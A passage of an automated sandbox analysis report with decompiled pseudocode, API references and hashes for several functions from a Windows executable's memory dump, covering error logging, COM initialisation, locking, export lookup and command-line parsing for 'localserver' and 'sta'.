0x010022c4
0x010022c5
0x010022c6
0x010022ab
0x010022b5
0x010022ba
0x0100228e
0x0100228e
0x0100229b
0x010022a0
0x0100228c
0x00000000
0x01002122
0x01002127
0x0100212d
0x01002135
0x010022ce
0x010022ce
0x00000000
0x010022ce
0x00000000
0x01002135
0x01002118

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000), ref: 010021AE
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 01002215

Strings

LogHr, xrefs: 01002168
%hs(%d)\%hs!%p: , xrefs: 010021CF
[%hs(%hs)], xrefs: 01002294
FailFast, xrefs: 0100215C
[%hs], xrefs: 010022AE
CallContext:[%hs] , xrefs: 01002279
Msg:[%ws] , xrefs: 01002261
ReturnHr, xrefs: 01002174
Exception, xrefs: 01002180
(caller: %p) , xrefs: 010021FA
%hs(%d) tid(%x) %08X %ws, xrefs: 01002225
, xrefs: 01002249
%hs!%p: , xrefs: 010021E0

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 2411632146-2849347638
Opcode ID: 2225ba626ff43e0079b2095f8dcbdb27314f9cb59e878246605929ecf2ea4c83
Instruction ID: 82189d850af1c01bfb363cc84961ce1728ffa037674e3551dce81401eb1d88e6
Opcode Fuzzy Hash: 2225ba626ff43e0079b2095f8dcbdb27314f9cb59e878246605929ecf2ea4c83
Instruction Fuzzy Hash: 1D510275900301BBFB339BA98C4CEAB7AFAEB68704F04459DF6C992192DA31D544CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01002A6E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01002A6E(void* __ecx, intOrPtr* __edx) {
				void* _v0;
				long _v8;
				long _v12;
				long _t11;
				long _t18;
				void* _t27;
				intOrPtr* _t40;
				void* _t41;

				_t27 = __ecx;
				_t41 = __ecx;
				_t40 = __edx;
				_t11 = WaitForSingleObject(__ecx, 0);
				if(_t11 != 0xffffffff) {
					if(_t11 == 0 || _t11 == 0x102) {
						_v8 = 0;
						if(_t11 != 0) {
							_v12 = 0;
							if(ReleaseSemaphore(_t41, 1,  &_v12) != 0) {
								if(_v12 == 0) {
									if(ReleaseSemaphore(_t41, 1, 0) != 0 || GetLastError() != 0x12a) {
										goto L24;
									} else {
										_t18 = WaitForSingleObject(_t41, 0);
										if(_t18 != 0xffffffff) {
											if(_t18 == 0) {
												L22:
												 *_t40 = _v8;
												return 0;
											}
											goto L24;
										}
										L2:
										return E01002925("wil");
									}
								}
								goto L24;
							}
							goto L2;
						}
						if(ReleaseSemaphore(_t41, 1,  &_v8) != 0) {
							_v8 = _v8 + 1;
							if(ReleaseSemaphore(_t41, 1, 0) != 0 || GetLastError() != 0x12a) {
								goto L24;
							} else {
								goto L22;
							}
						}
						goto L2;
					} else {
						L24:
						E01002906(_t27, 0x8000ffff);
						return 0x8000ffff;
					}
				}
				goto L2;
			}

0x01002a6e
0x01002a7b
0x01002a7f
0x01002a81
0x01002a8a
0x01002aa5
0x01002ab8
0x01002abd
0x01002aff
0x01002b0e
0x01002b1d
0x01002b32
0x00000000
0x01002b41
0x01002b43
0x01002b4c
0x01002b5a
0x01002b63
0x01002b66
0x00000000
0x01002b68
0x00000000
0x01002b5c
0x01002a91
0x00000000
0x01002a99
0x01002b32
0x00000000
0x01002b1f
0x00000000
0x01002b10
0x01002ace
0x01002ad7
0x01002ae6
0x00000000
0x00000000
0x00000000
0x00000000
0x01002ae6
0x00000000
0x01002aae
0x01002b71
0x01002b7b
0x00000000
0x01002b80
0x01002aa5
0x00000000

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,?), ref: 01002A81

Strings

wil, xrefs: 01002A94

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: da1eb4cf25d17067a7d555e4f749f171a1d3d253436a47bf29d66e531d750bef
Instruction ID: 95ea8bb690e7a06f6332195c99ab44a84a28fec20f437a97c2d5de44661d4391
Opcode Fuzzy Hash: da1eb4cf25d17067a7d555e4f749f171a1d3d253436a47bf29d66e531d750bef
Instruction Fuzzy Hash: FE318430704609ABFB234E69988CBAF36ADEF85354F204075F9CAD61C5DB798D418762

Uniqueness

Uniqueness Score: -1.00%

Function 010035F3 Relevance: 15.1, APIs: 10, Instructions: 102
threadCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E010035F3(int __eax, WCHAR* __ecx) {
				WCHAR* _v8;
				char _v36;
				WCHAR** _t16;
				void* _t27;
				void* _t28;
				long _t33;
				void* _t34;
				void* _t37;

				_t9 = __eax;
				_v8 = __ecx;
				__imp__CoInitializeEx(0, 2);
				if(__eax >= 0) {
					__imp__CoInitializeSecurity(0x100196c, 0, 0, 0, 0, 0, 0, 8, 0);
					if(__eax < 0) {
						L15:
						__imp__CoUninitialize();
						return _t9;
					}
					E01001FFF(__ecx);
					_t9 = CreateEventW(0, 1, 0, 0);
					 *0x100841c = _t9;
					if(_t9 == 0) {
						goto L15;
					}
					_t33 = GetCurrentThreadId();
					_t37 = E01005373();
					if( *((intOrPtr*)(_t37 + 4)) == 0) {
						 *0x10084ac = 0;
						 *0x10084a8 = 0x1001028;
						 *0x10084b0 = _t33;
						 *((intOrPtr*)(_t37 + 4)) = 0x10084a8;
					}
					_t27 = E01004C9B(_t37);
					_t34 = CreateEventW(0, 0, 0, _v8);
					if(_t34 != 0) {
						SetEvent(_t34);
						CloseHandle(_t34);
					}
					if(_t27 < 0) {
						_t28 = 0;
						goto L14;
					} else {
						_t16 =  &_v8;
						_t28 = 0;
						__imp__CoWaitForMultipleHandles(0, 0x7530, 1, 0x100841c, _t16);
						if(_t16 != 0) {
							L12:
							E0100339C(_t37);
							L14:
							_t9 = CloseHandle( *0x100841c);
							 *0x100841c = _t28;
							goto L15;
						}
						while(1) {
							_push(_t28);
							_push(_t28);
							_push(_t28);
							_push( &_v36);
							if( *0x100b038() <= 0) {
								goto L12;
							}
							 *0x100b03c( &_v36);
							 *0x100b040( &_v36);
						}
						goto L12;
					}
				}
				return __eax;
			}

0x010035f3
0x01003600
0x01003604
0x0100360c
0x01003620
0x01003628
0x01003710
0x01003710
0x00000000
0x01003710
0x0100362e
0x01003638
0x0100363e
0x01003645
0x00000000
0x00000000
0x01003653
0x0100365a
0x0100365f
0x01003661
0x01003667
0x01003671
0x01003677
0x01003677
0x01003688
0x01003695
0x01003699
0x0100369c
0x010036a3
0x010036a3
0x010036ab
0x010036fa
0x00000000
0x010036ad
0x010036ad
0x010036b0
0x010036c0
0x010036c8
0x010036f1
0x010036f3
0x010036fc
0x01003702
0x01003709
0x00000000
0x0100370f
0x010036e0
0x010036e0
0x010036e1
0x010036e2
0x010036e6
0x010036ef
0x00000000
0x00000000
0x010036d0
0x010036da
0x010036da
0x00000000
0x010036e0
0x010036ab
0x0100371a

APIs

CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 01003604
CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(0100196C,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 01003620
CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 01003710

Part of subcall function 01001FFF: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(0100160C,00000000,00000001,010018E4,?), ref: 01002022

CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 01003638
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0100364D
CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 0100368F
SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 0100369C
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 010036A3
CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,0100841C,?), ref: 010036C0
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 01003702

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: CreateEvent$CloseHandleInitialize$CurrentHandlesInstanceMultipleSecurityThreadUninitializeWait
String ID:
API String ID: 126492752-0
Opcode ID: 9307f75b58a2a0cb004aa19e05ca748dd34f1fd3bbf3a4b77e0aa39ef700b0fa
Instruction ID: 80ee92b43de3c8a4bd3eca70d8748d44d97d4a7f4fe75a7444d51419f5b9253f
Opcode Fuzzy Hash: 9307f75b58a2a0cb004aa19e05ca748dd34f1fd3bbf3a4b77e0aa39ef700b0fa
Instruction Fuzzy Hash: CB3189B1A00305AFF7239FB59C8CEAA7BACFB44645F00846DF5C9D6185DB7AD9044B21

Uniqueness

Uniqueness Score: -1.00%

Function 01003233 Relevance: 12.1, APIs: 8, Instructions: 108COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01008490), ref: 01003264
DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 01003273
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01008490), ref: 01003298
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01008490), ref: 010032AA
AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01008490), ref: 010032DE
EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 010032F0
DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 010032FE
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01008490), ref: 0100331B

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Lock$PointerReleaseShared$AcquireDecodeExclusive$Encode
String ID:
API String ID: 3770696666-0
Opcode ID: 57d6805ff10980a16d28e79f920643d8db00488ffe9bef06173339853a5a0da9
Instruction ID: 06f3738c9ddee64d545952c15cc4ec955fd79ffbb4f061e0fa886a5e9f70fa63
Opcode Fuzzy Hash: 57d6805ff10980a16d28e79f920643d8db00488ffe9bef06173339853a5a0da9
Instruction Fuzzy Hash: 9D416F35A00214EFEB239F69C8488AEBBB5FF49714F158099E98ADB355CB35AD01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01003B92 Relevance: 12.1, APIs: 8, Instructions: 99
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E01003B92(struct HINSTANCE__* __ecx, short* __edx, intOrPtr* _a4) {
				struct HINSTANCE__* _v8;
				int _v12;
				int _v16;
				short _t20;
				int _t21;
				int _t22;
				char _t28;
				char _t31;
				signed short _t33;
				char _t36;
				short* _t39;
				char* _t42;
				short* _t45;
				short* _t46;
				CHAR* _t47;
				void* _t48;
				CHAR* _t51;

				_t46 = __edx;
				_v8 = __ecx;
				 *_a4 = 0;
				_t36 = 0;
				if(__edx == 0) {
					L14:
					return _t36;
				}
				if( *((short*)(__edx)) != 0x23) {
					L4:
					_t39 = _t46;
					_t45 =  &(_t39[1]);
					do {
						_t20 =  *_t39;
						_t39 =  &(_t39[1]);
					} while (_t20 != 0);
					_t21 = (_t39 - _t45 >> 1) + 1;
					_v16 = _t21;
					_t22 = _t21 + _t21;
					_v12 = _t22;
					_t51 = LocalAlloc(0, _t22 + 2);
					if(_t51 == 0) {
						goto L14;
					}
					if(WideCharToMultiByte(0, 0x400, _t46, _v16, _t51, _v12, 0, 0) == 0) {
						L13:
						LocalFree(_t51);
						goto L14;
					}
					_t47 = _t51;
					_t10 =  &(_t47[1]); // 0x1
					_t42 = _t10;
					do {
						_t28 =  *_t47;
						_t47 =  &(_t47[1]);
					} while (_t28 != 0);
					_t48 = _t47 - _t42;
					_t51[_t48] = 0x57;
					_t36 = GetProcAddress(_v8, _t51);
					if(_t36 == 0) {
						_t51[_t48] = 0x41;
						 *_a4 = 1;
						_t31 = GetProcAddress(_v8, _t51);
						_t36 = _t31;
						if(_t36 == 0) {
							_t51[_t48] = _t31;
							_t36 = GetProcAddress(_v8, _t51);
						}
					}
					goto L13;
				}
				_t33 = __edx + 2;
				if( *_t33 == 0) {
					goto L4;
				} else {
					__imp___wtoi(_t33);
					_t36 = GetProcAddress(__ecx, _t33 & 0x0000ffff);
					goto L14;
				}
			}

0x01003ba2
0x01003ba6
0x01003ba9
0x01003bab
0x01003baf
0x01003c84
0x01003c8a
0x01003c8a
0x01003bb9
0x01003bdd
0x01003bdd
0x01003be1
0x01003be4
0x01003be4
0x01003be7
0x01003bea
0x01003bf3
0x01003bf6
0x01003bf9
0x01003bfb
0x01003c09
0x01003c0d
0x00000000
0x00000000
0x01003c29
0x01003c7b
0x01003c7c
0x00000000
0x01003c7c
0x01003c2b
0x01003c2d
0x01003c2d
0x01003c30
0x01003c30
0x01003c32
0x01003c33
0x01003c37
0x01003c3d
0x01003c49
0x01003c4d
0x01003c56
0x01003c5a
0x01003c60
0x01003c66
0x01003c6a
0x01003c70
0x01003c79
0x01003c79
0x01003c6a
0x00000000
0x01003c4d
0x01003bbb
0x01003bc1
0x00000000
0x01003bc3
0x01003bc4
0x01003bd6
0x00000000
0x01003bd6

APIs

_wtoi.MSVCRT ref: 01003BC4
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 01003BD0
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 01003C03
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,?,00000000,00000000), ref: 01003C21
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 01003C43
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 01003C60
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 01003C73
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,00000000,?,00000000,00000000), ref: 01003C7C

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: AddressProc$Local$AllocByteCharFreeMultiWide_wtoi
String ID:
API String ID: 3528786098-0
Opcode ID: 7af08e1184f49464f1c3e6de20e57957bf3ffc8482f3a143023509a60d537a3c
Instruction ID: 8ed57bf8ecbefbcd1d54e1f73d9444f6a0371477e1f07eb351d66c1aa0368155
Opcode Fuzzy Hash: 7af08e1184f49464f1c3e6de20e57957bf3ffc8482f3a143023509a60d537a3c
Instruction Fuzzy Hash: 6831C475501205AFDB238BA998489AA7FF8FF48314F044099FD89C7241DB768E01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0100564D Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0100564D(WCHAR* __ecx, signed int* __edx, WCHAR** _a4, signed int* _a8, signed int* _a12) {
				WCHAR* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _t40;
				signed int _t41;
				signed short _t44;
				signed int* _t45;
				signed int _t47;
				signed short _t53;
				signed int _t55;
				void* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed short _t66;
				signed int _t67;
				signed int _t68;
				signed short _t69;
				signed int _t70;
				signed int _t72;
				signed int* _t74;
				signed int _t75;
				signed int _t76;
				void* _t77;
				WCHAR* _t79;
				void* _t80;
				signed int _t81;
				signed short _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed short _t90;
				void* _t94;
				void* _t95;
				void* _t97;
				WCHAR* _t98;
				void* _t99;
				signed short _t100;
				WCHAR* _t103;
				void* _t104;
				void* _t105;
				signed int _t106;

				_t103 = __ecx;
				_v16 = 0x2f;
				_t79 = 0;
				_v8 = __ecx;
				 *_a4 = 0;
				_t74 = __edx;
				_t106 = __ecx;
				_v12 = __edx;
				 *__edx = 0;
				 *_a8 = 0;
				_t94 = 0x20;
				 *_a12 = 0;
				if( *__ecx == 0) {
					L22:
					_t40 =  *_t103 & 0x0000ffff;
					if(_t40 != 0) {
						_t95 = 0x2c;
						_t80 = 0x22;
						if(_t40 != _t80) {
							_t41 =  *_t106 & 0x0000ffff;
							if(_t41 == 0) {
								L38:
								if( *_t106 != 0) {
									_t43 = 0;
									L42:
									 *_t106 = _t43;
									_t106 = _t106 + 2;
									_t44 =  *_t106 & 0x0000ffff;
									if(_t44 == 0) {
										L48:
										_t45 = _v12;
										_t75 = _t106;
										_t81 = _t106;
										_v20 = _t75;
										_v8 = _t106;
										_v16 = _t81;
										if(( *_t45 & 0x00000003) != 0) {
											L67:
											 *_a4 = _t103;
											_t47 =  *_t45 & 0x00000003;
											if(_t47 != 0) {
												_t106 = _t81;
											}
											asm("sbb eax, eax");
											 *_a8 =  !( ~_t47) & _t75;
											 *_a12 = _t106;
											return 1;
										}
										_t53 =  *_t106 & 0x0000ffff;
										if(_t53 == 0) {
											goto L23;
										}
										_t84 = _t53;
										_t97 = 0x20;
										while(1) {
											_t76 = _t84 & 0x0000ffff;
											if(_t84 == _t97) {
												break;
											}
											_t106 = _t106 + 2;
											_t63 =  *_t106 & 0x0000ffff;
											_t84 = _t63;
											_t76 = _t63;
											if(_t63 != 0) {
												continue;
											}
											break;
										}
										_t98 = _v8;
										if(_t76 == 0) {
											L59:
											_t55 =  *_t98 & 0x0000ffff;
											if(_t55 == 0) {
												L64:
												_t98 = 0;
												L65:
												if(_t98 != 0) {
													goto L23;
												}
												_t81 = _v16;
												_t75 = _v20;
												_t45 = _v12;
												goto L67;
											}
											_t85 = _t55;
											while(_t85 != 0x5c) {
												_t57 = 0x2f;
												if(_t85 == _t57) {
													goto L65;
												}
												_t98 = CharNextW(_t98);
												_t59 =  *_t98 & 0x0000ffff;
												_t85 = _t59;
												if(_t59 != 0) {
													continue;
												}
												goto L64;
											}
											goto L65;
										}
										 *_t106 = 0;
										_t106 = _t106 + 2;
										_t61 =  *_t106 & 0x0000ffff;
										if(_t61 == 0) {
											goto L59;
										}
										_t86 = _t61;
										_t99 = 0x20;
										while(_t86 <= _t99) {
											_t106 = _t106 + 2;
											_t62 =  *_t106 & 0x0000ffff;
											_t86 = _t62;
											if(_t62 != 0) {
												continue;
											}
											break;
										}
										_t98 = _v8;
										goto L59;
									}
									_t87 = _t44 & 0x0000ffff;
									_t104 = 0x20;
									while(_t87 == _t104 || _t87 == _t95) {
										_t106 = _t106 + 2;
										_t64 =  *_t106 & 0x0000ffff;
										_t87 = _t64;
										if(_t64 != 0) {
											continue;
										}
										break;
									}
									_t103 = _v8;
									goto L48;
								}
								if(( *_t74 & 0x00000003) != 0) {
									goto L48;
								}
								goto L23;
							}
							_t88 = _t41;
							_t105 = 0x20;
							while(_t88 != _t105 && _t88 != _t95) {
								_t106 = _t106 + 2;
								_t65 =  *_t106 & 0x0000ffff;
								_t88 = _t65;
								if(_t65 != 0) {
									continue;
								}
								break;
							}
							_t103 = _v8;
							goto L38;
						}
						_t17 = _t106 + 2; // 0x2
						_t103 = _t17;
						_t106 = _t103;
						_v8 = _t103;
						_t66 =  *_t106 & 0x0000ffff;
						_t89 = _t66;
						if(_t66 == 0) {
							L30:
							_t43 = 0;
							if(_t89 == 0) {
								return 0;
							}
							goto L42;
						}
						_t100 = _t66;
						_t77 = 0x22;
						while(1) {
							_t89 = _t100 & 0x0000ffff;
							if(_t100 == _t77) {
								break;
							}
							_t106 = _t106 + 2;
							_t67 =  *_t106 & 0x0000ffff;
							_t100 = _t67;
							_t89 = _t67;
							if(_t67 != 0) {
								continue;
							}
							break;
						}
						_t95 = 0x2c;
						goto L30;
					}
					L23:
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					if( *_t103 != _t94) {
						L4:
						_t68 =  *_t103 & 0x0000ffff;
						if(_t68 == _v16 || _t68 == 0x2d) {
							_t9 = _t106 + 2; // 0x2
							_t103 = _t9;
							_t69 =  *_t103 & 0x0000ffff;
							_t106 = _t103;
							_v8 = _t103;
							if(_t69 == 0) {
								goto L20;
							}
							_t90 = _t69;
							while(_t90 != _t94) {
								_t70 = _t90 & 0x0000ffff;
								if(_t70 == 0x4c) {
									L15:
									if(E010055E5(L"localserver",  &_v8) != 0) {
										 *_t74 =  *_t74 | 0x00000002;
									}
									L17:
									_t103 = _v8;
									_t94 = 0x20;
									L18:
									_t103 =  &(_t103[1]);
									_t106 = _t103;
									_v8 = _t103;
									_t72 =  *_t103 & 0x0000ffff;
									_t90 = _t72;
									if(_t72 != 0) {
										continue;
									}
									break;
								}
								if(_t70 == 0x53) {
									L13:
									if(E010055E5(0x1001948,  &_v8) != 0) {
										 *_t74 =  *_t74 | 0x00000001;
									}
									goto L17;
								}
								if(_t70 == 0x6c) {
									goto L15;
								}
								if(_t70 != 0x73) {
									goto L18;
								}
								goto L13;
							}
							_v8 = _t103;
							_t79 = 0;
							goto L20;
						} else {
							break;
						}
					} else {
						goto L2;
					}
					goto L4;
					L2:
					_t103 =  &(_t103[1]);
					_t106 = _t103;
					if( *_t103 == _t94) {
						goto L2;
					} else {
						_v8 = _t103;
						goto L4;
					}
					L20:
				} while ( *_t103 != _t79);
				_v8 = _t103;
				goto L22;
			}

0x0100565b
0x0100565d
0x01005664
0x01005666
0x01005669
0x0100566b
0x01005670
0x01005674
0x01005677
0x01005679
0x0100567e
0x0100567f
0x01005684
0x0100572b
0x0100572b
0x01005731
0x0100573c
0x0100573f
0x01005743
0x01005783
0x01005789
0x010057aa
0x010057af
0x010057bb
0x010057bd
0x010057bd
0x010057c0
0x010057c3
0x010057c9
0x010057eb
0x010057eb
0x010057ee
0x010057f0
0x010057f2
0x010057f5
0x010057f8
0x010057fe
0x0100589e
0x010058a3
0x010058a5
0x010058a8
0x010058aa
0x010058aa
0x010058b1
0x010058b7
0x010058bf
0x00000000
0x010058bf
0x01005804
0x0100580a
0x00000000
0x00000000
0x01005812
0x01005814
0x01005815
0x01005815
0x0100581b
0x00000000
0x00000000
0x0100581d
0x01005820
0x01005823
0x01005825
0x0100582a
0x00000000
0x00000000
0x00000000
0x0100582a
0x0100582c
0x01005832
0x0100585e
0x0100585e
0x01005864
0x01005889
0x0100588b
0x0100588d
0x0100588f
0x00000000
0x00000000
0x01005895
0x01005898
0x0100589b
0x00000000
0x0100589b
0x01005866
0x01005868
0x01005870
0x01005874
0x00000000
0x00000000
0x0100587d
0x0100587f
0x01005882
0x01005887
0x00000000
0x00000000
0x00000000
0x01005887
0x00000000
0x01005868
0x01005836
0x01005839
0x0100583c
0x01005842
0x00000000
0x00000000
0x01005846
0x01005848
0x01005849
0x0100584e
0x01005851
0x01005854
0x01005859
0x00000000
0x00000000
0x00000000
0x01005859
0x0100585b
0x00000000
0x0100585b
0x010057cd
0x010057d0
0x010057d1
0x010057db
0x010057de
0x010057e1
0x010057e6
0x00000000
0x00000000
0x00000000
0x010057e6
0x010057e8
0x00000000
0x010057e8
0x010057b4
0x00000000
0x00000000
0x00000000
0x010057b6
0x0100578d
0x0100578f
0x01005790
0x0100579a
0x0100579d
0x010057a0
0x010057a5
0x00000000
0x00000000
0x00000000
0x010057a5
0x010057a7
0x00000000
0x010057a7
0x01005745
0x01005745
0x01005748
0x0100574a
0x0100574d
0x01005750
0x01005755
0x01005776
0x01005776
0x0100577b
0x010058c7
0x010058c7
0x00000000
0x01005781
0x01005759
0x0100575b
0x0100575c
0x0100575c
0x01005762
0x00000000
0x00000000
0x01005764
0x01005767
0x0100576a
0x0100576c
0x01005771
0x00000000
0x00000000
0x00000000
0x01005771
0x01005775
0x00000000
0x01005775
0x01005733
0x00000000
0x00000000
0x00000000
0x00000000
0x0100568a
0x0100568a
0x0100568d
0x0100569c
0x0100569c
0x010056a3
0x010056aa
0x010056aa
0x010056ad
0x010056b0
0x010056b2
0x010056b8
0x00000000
0x00000000
0x010056ba
0x010056bc
0x010056c1
0x010056c7
0x010056ee
0x010056fd
0x010056ff
0x010056ff
0x01005702
0x01005702
0x01005707
0x01005708
0x01005708
0x0100570b
0x0100570d
0x01005710
0x01005713
0x01005718
0x00000000
0x00000000
0x00000000
0x01005718
0x010056cc
0x010056d8
0x010056e7
0x010056e9
0x010056e9
0x00000000
0x010056e7
0x010056d1
0x00000000
0x00000000
0x010056d6
0x00000000
0x00000000
0x00000000
0x010056d6
0x0100571a
0x0100571d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0100568f
0x0100568f
0x01005692
0x01005697
0x00000000
0x01005699
0x01005699
0x00000000
0x01005699
0x0100571f
0x0100571f
0x01005728
0x00000000

APIs

CharNextW.API-MS-WIN-CORE-STRING-L2-1-0(?,00000000,?,00000000,?), ref: 01005877

Strings

sta, xrefs: 010056DB
localserver, xrefs: 010056F1
/, xrefs: 0100565D

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: CharNext
String ID: /$localserver$sta
API String ID: 3213498283-3694077230
Opcode ID: 8fffab27dc222f113b429dbd4cdcc407387d4dcaf4eb687e7718ceea5963b38f
Instruction ID: eceea6087574734eaa36cb813e629bd8eb024e7962c921bdc61fb22f7b0b9a9d
Opcode Fuzzy Hash: 8fffab27dc222f113b429dbd4cdcc407387d4dcaf4eb687e7718ceea5963b38f
Instruction Fuzzy Hash: 0281C279A00216CAFF669E5D9C10279B7F1FF98650F5444AAEDC9E72C0EA308E41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01002B89 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E01002B89(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v532;
				intOrPtr* _v536;
				intOrPtr* _v540;
				void* _v544;
				short _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t18;
				int _t31;
				void* _t32;
				int _t41;
				void* _t42;
				void* _t44;
				void* _t45;
				signed int _t46;

				_t48 = (_t46 & 0xfffffff8) - 0x21c;
				_v8 =  *0x1008018 ^ (_t46 & 0xfffffff8) - 0x0000021c;
				_t18 = _a4;
				_t39 = 0x104;
				_push(_t31);
				_push(__ecx);
				_t41 = 0;
				_v536 = _t18;
				 *_t18 = 0;
